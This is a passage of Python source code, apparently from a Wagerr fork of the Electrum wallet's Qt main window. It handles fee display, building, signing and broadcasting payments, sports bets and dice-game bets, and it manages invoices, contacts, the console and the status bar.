                tx = make_tx(0)
                size = tx.estimated_size()
                self.size_e.setAmount(size)
            except BaseException:
                pass
        return
    except BaseException:
        self.logger.exception('')
        return
    size = tx.estimated_size()
    self.size_e.setAmount(size)
    fee = tx.get_fee()
    fee = None if self.not_enough_funds else fee
    # Displayed fee/fee_rate values are set according to user input.
    # Due to rounding or dropping dust in CoinChooser,
    # actual fees often differ somewhat.
    if freeze_feerate or self.fee_slider.is_active():
        # Feerate drives the displayed absolute fee.
        displayed_feerate = self.feerate_e.get_amount()
        if displayed_feerate is not None:
            displayed_feerate = quantize_feerate(displayed_feerate)
        else:
            # fallback to actual fee
            displayed_feerate = quantize_feerate(fee / size) if fee is not None else None
        self.feerate_e.setAmount(displayed_feerate)
        displayed_fee = round(displayed_feerate * size) if displayed_feerate is not None else None
        self.fee_e.setAmount(displayed_fee)
    else:
        # Absolute fee drives the displayed feerate.
        if freeze_fee:
            displayed_fee = self.fee_e.get_amount()
        else:
            # fallback to actual fee if nothing is frozen
            displayed_fee = fee
        self.fee_e.setAmount(displayed_fee)
        displayed_fee = displayed_fee if displayed_fee else 0
        displayed_feerate = quantize_feerate(displayed_fee / size) if displayed_fee is not None else None
        self.feerate_e.setAmount(displayed_feerate)
    # show/hide fee rounding icon
    feerounding = (fee - displayed_fee) if fee else 0
    self.set_feerounding_text(int(feerounding))
    self.feerounding_icon.setToolTip(self.feerounding_text)
    self.feerounding_icon.setVisible(abs(feerounding) >= 1)
    if self.max_button.isChecked():
        # In 'Max' mode the amount is derived from the tx, net of plugin fees.
        amount = tx.output_value()
        __, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
        amount_after_all_fees = amount - x_fee_amount
        self.amount_e.setAmount(amount_after_all_fees)
def from_list_delete(self, item):
    """Remove *item* from the manual coin-selection list and refresh the fee."""
    index = self.from_list.indexOfTopLevelItem(item)
    self.pay_from.pop(index)
    self.redraw_from_list()
    self.update_fee()
def from_list_menu(self, position):
    """Show a context menu for the 'Pay from' list offering a Remove action."""
    selected_item = self.from_list.itemAt(position)
    context_menu = QMenu()
    context_menu.addAction(_("Remove"), lambda: self.from_list_delete(selected_item))
    context_menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
    """Replace the manual coin selection with *coins* and repaint the list."""
    self.pay_from = list(coins)
    self.redraw_from_list()
def redraw_from_list(self):
    """Repaint the 'Pay from' coin list from self.pay_from."""
    self.from_list.clear()
    has_coins = bool(self.pay_from)
    self.from_label.setHidden(not has_coins)
    self.from_list.setHidden(not has_coins)
    def describe(coin):
        # "abcdef0123...9876543210:0<TAB>address"
        h = coin.get('prevout_hash')
        return h[0:10] + '...' + h[-10:] + ":%d"%coin.get('prevout_n') + u'\t' + "%s"%coin.get('address')
    for coin in self.pay_from:
        row = QTreeWidgetItem([describe(coin), self.format_amount(coin['value'])])
        self.from_list.addTopLevelItem(row)
def get_contact_payto(self, key):
    """Format contact *key* for the payto field ("label <address>" for addresses)."""
    contact_type, label = self.contacts.get(key)
    if contact_type == 'address':
        return label + ' <' + key + '>'
    return key
def update_completions(self):
    """Refresh the payto-field autocompleter with formatted contact entries."""
    entries = [self.get_contact_payto(key) for key in self.contacts]
    self.completions.setStringList(entries)
def protected(func):
    '''Password request wrapper. The password is passed to the function
    as the 'password' named argument. "None" indicates either an
    unencrypted wallet, or the user cancelled the password request.
    An empty input is passed as the empty string.

    Fix: compare to None with ``is`` rather than ``==`` (PEP 8 / E711).
    '''
    def request_password(self, *args, **kwargs):
        parent = self.top_level_window()
        self.password = None
        # Keep prompting until the password verifies or the user cancels.
        while self.wallet.has_keystore_encryption():
            if self.password is None:
                self.password = self.password_dialog(parent=parent)
                if self.password is None:
                    # User cancelled password input
                    return
            try:
                self.wallet.check_password(self.password)
                break
            except Exception as e:
                self.show_error(str(e), parent=parent)
                self.password = None
                continue
        kwargs['password'] = self.password
        return func(self, *args, **kwargs)
    return request_password
def is_send_fee_frozen(self):
    """True-ish when the user manually entered an absolute fee to be kept."""
    fee_field = self.fee_e
    if not (fee_field.isVisible() and fee_field.isModified()):
        return False
    return fee_field.text() or fee_field.hasFocus()
def is_send_feerate_frozen(self):
    """True-ish when the user manually entered a feerate to be kept."""
    rate_field = self.feerate_e
    if not (rate_field.isVisible() and rate_field.isModified()):
        return False
    return rate_field.text() or rate_field.hasFocus()
def get_send_fee_estimator(self):
    """Return the frozen absolute fee, a feerate-based estimator, or None."""
    if self.is_send_fee_frozen():
        return self.fee_e.get_amount()
    if self.is_send_feerate_frozen():
        feerate = self.feerate_e.get_amount()  # sat/byte
        feerate = 0 if feerate is None else feerate * 1000  # sat/kilobyte
        return partial(simple_config.SimpleConfig.estimate_fee_for_feerate, feerate)
    return None
def read_send_tab(self):
    """Collect (outputs, fee_estimator, label, coins) from the send tab."""
    label = self.message_e.text()
    if self.payment_request:
        outputs = self.payment_request.get_outputs()
    else:
        outputs = self.payto_e.get_outputs(self.max_button.isChecked())
    return outputs, self.get_send_fee_estimator(), label, self.get_coins()
def read_bet_tab(self,a):
    """Build tx outputs for a peerless or parlay bet from widget *a*.

    Returns (outputs, fee_estimator, label, coins); label is always None.
    Raises Exception when the bet cannot be encoded as an opcode.
    """
    label = None
    opCode = ''
    if hasattr(a, 'legs'):
        # Parlay bet: encode all legs into a single opcode.
        legs = list(a.legs)
        isParlayPeerlessBet, opCode = PeerlessBet.ParlayToOpCode(legs)
        amount = int(a.editBettingAmount.get_amount())
        if not isParlayPeerlessBet:
            # Fix: error message previously misspelled 'Parlay' as 'Paylay'.
            raise Exception('Error converting Parlay PeerlessBets to opcode')
    else:
        # Single peerless bet on one event outcome.
        eventId = int(a.eventIdToBetOn)
        outcome = int(a.betOutcome)
        amount = int(a.editBettingAmount.get_amount())
        print("Event Id: ",eventId)
        print("Outcome: ",outcome)
        print("Amount: ",amount)
        pb = PeerlessBet(eventId, outcome)
        isPeerlessBet, opCode = PeerlessBet.ToOpCode(pb)
        if not isPeerlessBet:
            raise Exception('Error converting PeerlessBet to opcode')
    print('OpCode:',opCode)
    outputs = [TxOutput(bitcoin.TYPE_BET, opCode, amount)]
    fee_estimator = self.get_send_fee_estimator()
    coins = self.get_coins()
    return outputs, fee_estimator, label, coins
def read_dice_tab(self, d):
    """Build tx outputs for a dice quick-game bet described by dialog *d*."""
    isDice, opCode = ChainGame.DiceToOpCode(d)
    amount = int(d.amount)
    if not isDice:
        raise Exception('Error converting Dice to opcode')
    print('OpCode:',opCode)
    outputs = [TxOutput(bitcoin.TYPE_QUICKGAME, opCode, amount)]
    return outputs, self.get_send_fee_estimator(), None, self.get_coins()
def check_send_tab_outputs_and_show_errors(self, outputs) -> bool:
    """Returns whether there are errors with outputs.
    Also shows error dialog to user if so.
    """
    pr = self.payment_request
    if pr:
        if pr.has_expired():
            self.show_error(_('Payment request has expired'))
            return True
    if not pr:
        # Free-form payto field: report parse errors and unvalidated aliases.
        errors = self.payto_e.get_errors()
        if errors:
            self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
            return True
        if self.payto_e.is_alias and self.payto_e.validated is False:
            alias = self.payto_e.toPlainText()
            msg = _('WARNING: the alias "{}" could not be validated via an additional '
                    'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
            msg += _('Do you wish to continue?')
            if not self.question(msg):
                return True
    if not outputs:
        self.show_error(_('No outputs'))
        return True
    # Per-output sanity checks: address present and valid, amount present.
    for o in outputs:
        if o.address is None:
            self.show_error(_('Wagerr Address is None'))
            return True
        if o.type == TYPE_ADDRESS and not bitcoin.is_address(o.address):
            self.show_error(_('Invalid Wagerr Address'))
            return True
        if o.value is None:
            self.show_error(_('Invalid Amount'))
            return True
    return False # no errors
def do_preview(self):
    """Build the transaction and display it without broadcasting."""
    self.do_send(preview=True)
def do_roll(self,d, bettype , preview = False):
    """Build, confirm, sign and broadcast a dice quick-game transaction.

    d -- dice dialog/widget describing the roll; bettype is forwarded in the
    args passed to broadcast_transaction. With preview=True the tx is only
    displayed, never broadcast.
    NOTE(review): this duplicates most of do_bet/do_send — candidate for a
    shared helper.
    """
    #print('do_roll called')
    if run_hook('abort_roll', self):
        return
    args = {"type": bettype}
    outputs, fee_estimator, tx_desc, coins = self.read_dice_tab(d)
    if self.check_send_tab_outputs_and_show_errors(outputs):
        return
    try:
        is_sweep = bool(self.tx_external_keypairs)
        #print('do_roll calling make_unsigned_transaction')
        tx = self.wallet.make_unsigned_transaction(
            coins, outputs, self.config, fixed_fee=fee_estimator,
            is_sweep=is_sweep)
        #print('do_roll calling make_unsigned_transaction done')
    except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
        self.show_message(str(e))
        return
    except InternalAddressCorruption as e:
        self.show_error(str(e))
        raise
    except BaseException as e:
        self.logger.exception('')
        self.show_message(str(e))
        return
    amount = tx.output_value() if self.max_button.isChecked() else sum(map(lambda x:x[2], outputs))
    fee = tx.get_fee()
    use_rbf = self.config.get('use_rbf', True)
    if use_rbf:
        tx.set_rbf(True)
    # Refuse fees below the server relay fee: the tx would never propagate.
    if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
        self.show_error('\n'.join([
            _("This transaction requires a higher fee, or it will not be propagated by your current server"),
            _("Try to raise your transaction fee, or use a server with a lower relay fee.")
        ]))
        return
    if preview:
        self.show_transaction(tx, tx_desc)
        return
    if not self.network:
        self.show_error(_("You can't broadcast a transaction without a live network connection."))
        return
    # confirmation dialog
    msg = [
        _("Amount to be sent") + ": " + self.format_amount_and_units(amount),
        _("Mining fee") + ": " + self.format_amount_and_units(fee),
    ]
    x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
    if x_fee:
        x_fee_address, x_fee_amount = x_fee
        msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
    feerate_warning = simple_config.FEERATE_WARNING_HIGH_FEE
    if fee > feerate_warning * tx.estimated_size() / 1000:
        msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
    if self.wallet.has_keystore_encryption():
        msg.append("")
        msg.append(_("Enter your password to proceed"))
        # NOTE(review): PEP 8 prefers 'self.password is None' here.
        if self.password == None:
            self.password = self.password_dialog('\n'.join(msg))
        if not self.password:
            return
    else:
        msg.append(_('Proceed?'))
        self.password = None
        if not self.question('\n'.join(msg)):
            return
    def sign_done(success):
        # Runs after signing completes (GUI thread).
        if success:
            if not tx.is_complete():
                self.show_transaction(tx)
                self.do_clear()
            else:
                print('do_roll sign_done else')
                self.broadcast_transaction(tx, tx_desc, args )
    print('do_roll calling sign_tx_with_password')
    self.sign_tx_with_password(tx, sign_done, self.password)
def do_bet(self,a , bettype ,preview = False):
    """Build, confirm, sign and broadcast a betting transaction.

    a -- betting widget/list item describing the bet; bettype and the item
    are forwarded in the args passed to broadcast_transaction. With
    preview=True the tx is only displayed, never broadcast.
    NOTE(review): this duplicates most of do_roll/do_send — candidate for a
    shared helper.
    """
    #print('do_bet called')
    args = {"type": bettype , "listitem": a }
    if run_hook('abort_bet', self):
        return
    outputs, fee_estimator, tx_desc, coins = self.read_bet_tab(a)
    if self.check_send_tab_outputs_and_show_errors(outputs):
        return
    try:
        is_sweep = bool(self.tx_external_keypairs)
        #print('do_bet calling make_unsigned_transaction')
        tx = self.wallet.make_unsigned_transaction(
            coins, outputs, self.config, fixed_fee=fee_estimator,
            is_sweep=is_sweep)
        #print('do_bet calling make_unsigned_transaction done')
    except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
        self.show_message(str(e))
        return
    except InternalAddressCorruption as e:
        self.show_error(str(e))
        raise
    except BaseException as e:
        self.logger.exception('')
        self.show_message(str(e))
        return
    amount = tx.output_value() if self.max_button.isChecked() else sum(map(lambda x:x[2], outputs))
    fee = tx.get_fee()
    use_rbf = self.config.get('use_rbf', True)
    if use_rbf:
        tx.set_rbf(True)
    # Refuse fees below the server relay fee: the tx would never propagate.
    if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
        self.show_error('\n'.join([
            _("This transaction requires a higher fee, or it will not be propagated by your current server"),
            _("Try to raise your transaction fee, or use a server with a lower relay fee.")
        ]))
        return
    if preview:
        self.show_transaction(tx, tx_desc)
        return
    if not self.network:
        self.show_error(_("You can't broadcast a transaction without a live network connection."))
        return
    # confirmation dialog
    msg = [
        _("Amount to be sent") + ": " + self.format_amount_and_units(amount),
        _("Mining fee") + ": " + self.format_amount_and_units(fee),
    ]
    x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
    if x_fee:
        x_fee_address, x_fee_amount = x_fee
        msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
    feerate_warning = simple_config.FEERATE_WARNING_HIGH_FEE
    if fee > feerate_warning * tx.estimated_size() / 1000:
        msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
    if self.wallet.has_keystore_encryption():
        msg.append("")
        msg.append(_("Enter your password to proceed"))
        # NOTE(review): PEP 8 prefers 'self.password is None' here.
        if self.password == None:
            self.password = self.password_dialog('\n'.join(msg))
        if not self.password:
            return
    else:
        msg.append(_('Proceed?'))
        self.password = None
        if not self.question('\n'.join(msg)):
            return
    def sign_done(success):
        # Runs after signing completes (GUI thread).
        if success:
            if not tx.is_complete():
                self.show_transaction(tx)
                self.do_clear()
            else:
                print('do_bet sign_done else')
                self.broadcast_transaction(tx, tx_desc,args)
    print('do_bet calling sign_tx_with_password')
    self.sign_tx_with_password(tx, sign_done, self.password)
def do_send(self, preview = False):
    """Build, confirm, sign and broadcast a transaction from the send tab.

    With preview=True the transaction is only displayed, never broadcast.
    Fixes: leftover debug prints removed; '== None' replaced by 'is None'
    (PEP 8 / E711).
    """
    if run_hook('abort_send', self):
        return
    outputs, fee_estimator, tx_desc, coins = self.read_send_tab()
    if self.check_send_tab_outputs_and_show_errors(outputs):
        return
    try:
        is_sweep = bool(self.tx_external_keypairs)
        tx = self.wallet.make_unsigned_transaction(
            coins, outputs, self.config, fixed_fee=fee_estimator,
            is_sweep=is_sweep)
    except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
        self.show_message(str(e))
        return
    except InternalAddressCorruption as e:
        self.show_error(str(e))
        raise
    except BaseException as e:
        self.logger.exception('')
        self.show_message(str(e))
        return
    amount = tx.output_value() if self.max_button.isChecked() else sum(map(lambda x:x[2], outputs))
    fee = tx.get_fee()
    use_rbf = self.config.get('use_rbf', True)
    if use_rbf:
        tx.set_rbf(True)
    # Refuse fees below the server relay fee: the tx would never propagate.
    if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
        self.show_error('\n'.join([
            _("This transaction requires a higher fee, or it will not be propagated by your current server"),
            _("Try to raise your transaction fee, or use a server with a lower relay fee.")
        ]))
        return
    if preview:
        self.show_transaction(tx, tx_desc)
        return
    if not self.network:
        self.show_error(_("You can't broadcast a transaction without a live network connection."))
        return
    # confirmation dialog
    msg = [
        _("Amount to be sent") + ": " + self.format_amount_and_units(amount),
        _("Mining fee") + ": " + self.format_amount_and_units(fee),
    ]
    x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
    if x_fee:
        x_fee_address, x_fee_amount = x_fee
        msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
    feerate_warning = simple_config.FEERATE_WARNING_HIGH_FEE
    if fee > feerate_warning * tx.estimated_size() / 1000:
        msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
    if self.wallet.has_keystore_encryption():
        msg.append("")
        msg.append(_("Enter your password to proceed"))
        if self.password is None:
            self.password = self.password_dialog('\n'.join(msg))
        if not self.password:
            return
    else:
        msg.append(_('Proceed?'))
        self.password = None
        if not self.question('\n'.join(msg)):
            return
    def sign_done(success):
        # Runs after signing completes (GUI thread).
        if success:
            if not tx.is_complete():
                self.show_transaction(tx)
                self.do_clear()
            else:
                self.broadcast_transaction(tx, tx_desc)
    self.sign_tx_with_password(tx, sign_done, self.password)
@protected
def sign_tx(self, tx, callback, password):
    """Sign *tx* then invoke callback(success); @protected injects *password*."""
    self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
    """Sign *tx* on a background thread, then call callback(bool success)."""
    def on_success(result):
        callback(True)
    def on_failure(exc_info):
        self.on_error(exc_info)
        self.password = None
        callback(False)
    # Plugins (e.g. TrustedCoin) may wrap the success callback.
    success_cb = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
    if self.tx_external_keypairs:
        # Sweeping external keys: sign directly with the supplied keypairs.
        task = partial(Transaction.sign, tx, self.tx_external_keypairs)
    else:
        task = partial(self.wallet.sign_transaction, tx, password)
    WaitingDialog(self, _('Signing transaction...'), task, success_cb, on_failure)
def broadcast_transaction(self, tx, tx_desc,args = None):
    """Broadcast *tx* on a background thread and report the result in the GUI.

    tx_desc, if set, becomes the wallet label for the txid. *args* is passed
    through to the "tx_brodcasted" event callback (NOTE(review): that event
    name's misspelling is part of the API listeners subscribe to elsewhere —
    do not "fix" it here alone).
    """
    print('broadcast_transaction')
    def broadcast_thread():
        # non-GUI thread
        pr = self.payment_request
        if pr and pr.has_expired():
            self.payment_request = None
            return False, _("Payment request has expired")
        status = False
        try:
            self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
        except TxBroadcastError as e:
            msg = e.get_message_for_gui()
        except BestEffortRequestFailed as e:
            msg = repr(e)
        else:
            status, msg = True, tx.txid()
        if pr and status is True:
            # BIP70 flow: mark the invoice paid and send the payment ACK.
            self.invoices.set_paid(pr, tx.txid())
            self.invoices.save()
            self.payment_request = None
            refund_address = self.wallet.get_receiving_address()
            coro = pr.send_payment_and_receive_paymentack(str(tx), refund_address)
            fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
            ack_status, ack_msg = fut.result(timeout=20)
            # NOTE(review): this asyncio.sleep(3) is never awaited, so it does
            # nothing except create an un-run coroutine (RuntimeWarning) —
            # time.sleep(3) was probably intended; confirm.
            asyncio.sleep(3)
            self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
        return status, msg
    # Capture current TL window; override might be removed on return
    parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
    def broadcast_done(result):
        # GUI thread
        if result:
            status, msg = result
            if status:
                if tx_desc is not None and tx.is_complete():
                    self.wallet.set_label(tx.txid(), tx_desc)
                parent.show_message(_('Payment sent.') + '\n' + msg)
                self.invoice_list.update()
                Event.getInstance().trigger_callback("tx_brodcasted",args)
                self.do_clear()
            else:
                msg = msg or ''
                parent.show_error(msg)
    WaitingDialog(self, _('Broadcasting transaction...'),
                  broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
    """Modal radio-button chooser; returns the selected index or None.

    Needed by QtHandler for hardware wallets.
    """
    dialog = WindowModalDialog(self.top_level_window())
    choices_layout = ChoicesLayout(msg, choices)
    layout = QVBoxLayout(dialog)
    layout.addLayout(choices_layout.layout())
    layout.addLayout(Buttons(OkButton(dialog)))
    if dialog.exec_():
        return choices_layout.selected_index()
    return None
def lock_amount(self, b):
    """Freeze/unfreeze the amount field; Max is unusable while locked."""
    self.amount_e.setFrozen(b)
    self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
    """Freeze the send tab while a BIP70 payment request is being fetched."""
    self.show_send_tab()
    self.payto_e.is_pr = True
    for field in (self.payto_e, self.message_e):
        field.setFrozen(True)
    self.lock_amount(True)
    self.payto_e.setText(_("please wait..."))
    return True
def delete_invoice(self, key):
    """Remove invoice *key* from storage and refresh the invoice list."""
    self.invoices.remove(key)
    self.invoice_list.update()
def payment_request_ok(self):
    """Handle a successfully verified payment request: register it as an
    invoice and fill the send form from it (unless it is already paid)."""
    pr = self.payment_request
    if not pr:
        return
    key = self.invoices.add(pr)
    status = self.invoices.get_status(key)
    self.invoice_list.update()
    if status == PR_PAID:
        self.show_message("invoice already paid")
        self.do_clear()
        self.payment_request = None
        return
    self.payto_e.is_pr = True
    # Green styling = request still valid; expired styling otherwise.
    if not pr.has_expired():
        self.payto_e.setGreen()
    else:
        self.payto_e.setExpired()
    self.payto_e.setText(pr.get_requestor())
    self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
    self.message_e.setText(pr.get_memo())
    # signal to set fee
    self.amount_e.textEdited.emit("")
def payment_request_error(self):
    """Show the failed payment request's error and reset the send form."""
    request = self.payment_request
    if not request:
        return
    self.show_message(request.error)
    self.payment_request = None
    self.do_clear()
def on_pr(self, request):
    """Store *request* and signal the GUI thread with the verification result."""
    self.payment_request = request
    verified = self.payment_request.verify(self.contacts)
    signal = self.payment_request_ok_signal if verified else self.payment_request_error_signal
    signal.emit()
def pay_to_URI(self, URI):
    """Parse a payment URI and fill the send tab from its fields."""
    if not URI:
        return
    try:
        out = util.parse_URI(URI, self.on_pr)
    except InvalidBitcoinURI:
        # Silently ignore malformed URIs (error dialog intentionally disabled).
        #self.show_error(_("Error parsing URI") + f":\n{e}") #uncomment this later
        return
    self.show_send_tab()
    # A BIP70/BIP72 request ('r', or a signed 'name') is fetched asynchronously.
    if out.get('r') or (out.get('name') and out.get('sig')):
        self.prepare_for_payment_request()
        return
    address = out.get('address')
    amount = out.get('amount')
    # use label as description (not BIP21 compliant)
    message = out.get('message') or out.get('label')
    if address:
        self.payto_e.setText(address)
    if message:
        self.message_e.setText(message)
    if amount:
        self.amount_e.setAmount(amount)
        self.amount_e.textEdited.emit("")
def do_clear(self):
    """Reset the send tab to its default empty state."""
    self.max_button.setChecked(False)
    self.not_enough_funds = False
    self.payment_request = None
    self.payto_e.is_pr = False
    # Clear and unfreeze every text field.
    for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e,
              self.fee_e, self.feerate_e]:
        e.setText('')
        e.setFrozen(False)
    #self.eventid_e.is_pr = False
    # for e in [self.eventid_e, self.outcome_e, self.betting_amount_e]:
    #     e.setText('')
    #     e.setFrozen(False)
    # Restore slider-driven fee defaults.
    self.fee_slider.activate()
    self.feerate_e.setAmount(self.config.fee_per_byte())
    self.size_e.setAmount(0)
    self.feerounding_icon.setVisible(False)
    self.set_pay_from([])
    self.tx_external_keypairs = {}
    self.update_status()
    run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
    """Freeze or unfreeze *addrs* in the wallet and refresh dependent views."""
    self.wallet.set_frozen_state_of_addresses(addrs, freeze)
    for view in (self.address_list, self.utxo_list):
        view.update()
    self.update_fee()
def set_frozen_state_of_coins(self, utxos, freeze: bool):
    """Freeze or unfreeze *utxos* in the wallet and refresh the coin view."""
    self.wallet.set_frozen_state_of_coins(utxos, freeze)
    self.utxo_list.update()
    self.update_fee()
def create_list_tab(self, l, toolbar=None):
    """Wrap list view *l* (plus an optional toolbar) in a searchable tab widget."""
    container = QWidget()
    container.searchable_list = l
    layout = QVBoxLayout()
    container.setLayout(layout)
    layout.setContentsMargins(0, 0, 0, 0)
    layout.setSpacing(0)
    if toolbar:
        layout.addLayout(toolbar)
    layout.addWidget(l)
    return container
def create_addresses_tab(self):
    """Create the Addresses tab with its optional toolbar."""
    from .address_list import AddressList
    self.address_list = address_list = AddressList(self)
    toolbar = address_list.create_toolbar(self.config)
    address_list.show_toolbar(self.config.get('show_toolbar_addresses', False))
    return self.create_list_tab(address_list, toolbar)
def create_utxo_tab(self):
    """Create the Coins (UTXO) tab."""
    from .utxo_list import UTXOList
    self.utxo_list = utxo_list = UTXOList(self)
    return self.create_list_tab(utxo_list)
def create_contacts_tab(self):
    """Create the Contacts tab."""
    from .contact_list import ContactList
    self.contact_list = contact_list = ContactList(self)
    return self.create_list_tab(contact_list)
def remove_address(self, addr):
    """After user confirmation, delete *addr* from the wallet and refresh."""
    if not self.question(_("Do you want to remove {} from your wallet?").format(addr)):
        return
    self.wallet.delete_address(addr)
    self.need_update.set() # history, addresses, coins
    self.clear_receive_tab()
def get_coins(self):
    """Return manually selected coins, else all spendable wallet coins."""
    return self.pay_from or self.wallet.get_spendable_coins(None, self.config)
def spend_coins(self, coins):
    """Use *coins* as the send tab's inputs and switch to that tab."""
    self.set_pay_from(coins)
    self.show_send_tab()
    self.update_fee()
def paytomany(self):
    """Switch the send tab into multi-output ('pay to many') mode with help text."""
    self.show_send_tab()
    self.payto_e.paytomany()
    help_lines = [
        _('Enter a list of outputs in the \'Pay to\' field.'),
        _('One output per line.'),
        _('Format: address, amount'),
        _('You may load a CSV file using the file icon.'),
    ]
    self.show_message('\n'.join(help_lines), title=_('Pay to many'))
def payto_contacts(self, labels):
    """Populate the send tab's payto field from the given contact labels."""
    recipients = [self.get_contact_payto(label) for label in labels]
    self.show_send_tab()
    if len(recipients) == 1:
        self.payto_e.setText(recipients[0])
        self.amount_e.setFocus()
    else:
        # Multi-recipient: one "payto, 0" line per contact.
        lines = [recipient + ", 0" for recipient in recipients]
        self.payto_e.setText("\n".join(lines))
        self.payto_e.setFocus()
def set_contact(self, label, address):
    """Add or update a contact; returns False for an invalid address."""
    if not is_address(address):
        self.show_error(_('Invalid Address'))
        self.contact_list.update() # Displays original unchanged value
        return False
    self.contacts[address] = ('address', label)
    for view in (self.contact_list, self.history_list,
                 self.betting_history_list, self.dice_history_list):
        view.update()
    self.update_completions()
    return True
def delete_contacts(self, labels):
    """After confirmation, remove the given contact labels and refresh views."""
    prompt = _("Remove {} from your list of contacts?").format(" + ".join(labels))
    if not self.question(prompt):
        return
    for label in labels:
        self.contacts.pop(label)
    for view in (self.history_list, self.betting_history_list,
                 self.dice_history_list, self.contact_list):
        view.update()
    self.update_completions()
def show_invoice(self, key):
    """Look up invoice *key*, refresh its signature status, and display it."""
    invoice = self.invoices.get(key)
    if invoice is None:
        self.show_error('Cannot find payment request in wallet.')
        return
    invoice.verify(self.contacts)
    self.show_pr_details(invoice)
def show_pr_details(self, pr):
    """Show a modal dialog with the details of payment request *pr*,
    offering export-to-file and delete actions."""
    key = pr.get_id()
    d = WindowModalDialog(self, _("Invoice"))
    vbox = QVBoxLayout(d)
    grid = QGridLayout()
    grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
    grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
    grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
    outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
    grid.addWidget(QLabel(outputs_str), 1, 1)
    expires = pr.get_expiration_date()
    grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
    grid.addWidget(QLabel(pr.get_memo()), 2, 1)
    grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
    grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
    if expires:
        grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
        grid.addWidget(QLabel(format_time(expires)), 4, 1)
    vbox.addLayout(grid)
    def do_export():
        # Save the raw BIP70 payment request to a user-chosen file.
        name = str(key) + '.bip70'
        fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70")
        if not fn:
            return
        with open(fn, 'wb') as f:
            f.write(pr.raw)
        # Fix: translate only the fixed message, not the dynamic filename —
        # the old code passed the concatenated string to _(), which can never
        # match a translation catalog entry.
        self.show_message(_('Invoice saved as') + ' ' + fn)
    exportButton = EnterButton(_('Save'), do_export)
    def do_delete():
        if self.question(_('Delete invoice?')):
            self.invoices.remove(key)
            self.history_list.update()
            self.betting_history_list.update()
            self.dice_history_list.update()
            self.invoice_list.update()
            d.close()
    deleteButton = EnterButton(_('Delete'), do_delete)
    vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
    d.exec_()
def do_pay_invoice(self, key):
    """Load invoice *key* into the send tab and re-verify it."""
    invoice = self.invoices.get(key)
    self.payment_request = invoice
    self.prepare_for_payment_request()
    invoice.error = None  # this forces verify() to re-run
    if invoice.verify(self.contacts):
        self.payment_request_ok()
    else:
        self.payment_request_error()
def create_console_tab(self):
    """Create the Python console tab."""
    from .console import Console
    self.console = Console()
    return self.console
def update_console(self):
    """Populate the console namespace with wallet/network objects and commands."""
    console = self.console
    console.history = self.config.get("console-history",[])
    console.history_index = len(console.history)
    console.updateNamespace({
        'wallet': self.wallet,
        'network': self.network,
        'plugins': self.gui_object.plugins,
        'window': self,
        'config': self.config,
        'electrum': electrum,
        'daemon': self.gui_object.daemon,
        'util': util,
        'bitcoin': bitcoin,
    })
    c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
    methods = {}
    def mkfunc(f, method):
        # Bind each CLI command as a console function that can prompt for a password.
        return lambda *args: f(method, args, self.password_dialog)
    # Expose every public command except the ones shadowing namespace entries.
    for m in dir(c):
        if m[0]=='_' or m in ['network','wallet','config']: continue
        methods[m] = mkfunc(c._run, m)
    console.updateNamespace(methods)
def create_status_bar(self):
    """Build the status bar: balance, block height, search box and tool buttons."""
    sb = QStatusBar()
    sb.setFixedHeight(35)
    self.balance_label = QLabel("Loading wallet...")
    self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
    self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
    sb.addWidget(self.balance_label)
    self.blockchain_status = QLabel("Height:")
    self.blockchain_status.setStyleSheet("QLabel { font-weight:bold }")
    sb.addPermanentWidget(self.blockchain_status)
    # Hidden search box, toggled by toggle_search().
    self.search_box = QLineEdit()
    self.search_box.textChanged.connect(self.do_search)
    self.search_box.hide()
    sb.addPermanentWidget(self.search_box)
    # Update-available indicator (hidden until an update is detected).
    self.update_check_button = QPushButton("")
    self.update_check_button.setFlat(True)
    self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
    self.update_check_button.setIcon(read_QIcon("update.png"))
    self.update_check_button.hide()
    sb.addPermanentWidget(self.update_check_button)
